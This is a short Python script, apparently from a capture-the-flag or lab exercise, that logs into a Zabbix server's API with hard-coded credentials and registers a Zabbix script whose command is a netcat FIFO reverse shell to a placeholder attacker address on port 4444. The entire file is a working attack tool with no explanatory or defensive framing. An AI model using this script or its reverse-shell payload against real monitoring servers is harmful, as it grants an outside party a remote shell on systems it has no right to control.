#!/usr/bin/env python
 
from pyzabbix import ZabbixAPI
import sys
import logging
 
stream = logging.StreamHandler(sys.stdout)
stream.setLevel(logging.DEBUG)
log = logging.getLogger('pyzabbix')
log.addHandler(stream)
log.setLevel(logging.DEBUG)
zapi = ZabbixAPI("http://10.10.10.108/zabbix")
zapi.login("zapper", "zapper")
print ("Connected to %s" % zapi.api_version() )
 
zapi.do_request('script.create',
                 {
                   
                    'name': 'put',
                    'command': 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.XXX 4444 >/tmp/f',
                    'host_acces': 1,
                    'execute_on': 0
 
                            }
               
    )
